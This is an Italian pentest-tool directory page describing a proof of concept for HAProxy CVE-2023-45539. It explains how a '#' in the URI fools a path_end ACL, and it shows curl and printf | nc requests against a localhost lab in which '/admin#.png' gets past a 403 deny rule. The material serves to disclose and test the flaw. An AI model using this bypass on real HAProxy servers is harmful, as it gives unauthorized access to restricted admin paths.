Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
HAProxy-CVE-2023-45539-PoC — HAProxy-CVE-2023-45539-PoC | Kitploit
Strumenti/GitHubGitHub/slicingmelon/haproxy-cve-2023-45539-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingConfigurazione Errata
GitHubslicingmelon/haproxy-cve-2023-45539-poc

HAProxy-CVE-2023-45539-PoC

HAProxy-CVE-2023-45539-PoC

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

HAProxy-CVE-2023-45539-PoC

HAProxy precedente alla versione 2.8.2 accetta # come parte del componente URI, il che potrebbe consentire a un attaccante remoto di ottenere informazioni sensibili o avere un impatto non specificato a causa di un'interpretazione errata di una regola path_end, come instradare index.html#.png a un server statico.

Ciò che viene instradato erroneamente in questa CVE non è un'estensione che l'app backend "supporta" — ma solo quelle che HAProxy stesso è configurato per instradare usando ACL path_end (o regex).

root@kitploit:~
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static

Ciò significa:

  • HAProxy non si preoccupa se il backend possa effettivamente servire .png, .js, ecc.
  • Osserva solo la corrispondenza del suffisso nel percorso della richiesta.
  • Se il suffisso corrisponde a una di quelle stringhe, instrada verso be_static.
  • Quindi:

/admin#.png → corrisponde a .png → va a be_static → bypass

/admin#.asc → non corrisponde → rimane in be_app → raggiunge deny → 403

root@kitploit:~
curl -i http://localhost:6655/public                                               
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain

APP OK
root@kitploit:~
curl -i http://localhost:6655/admin 
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

Bypass

root@kitploit:~
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain

STATIC OK (routed by path_end)
Scarica lo strumento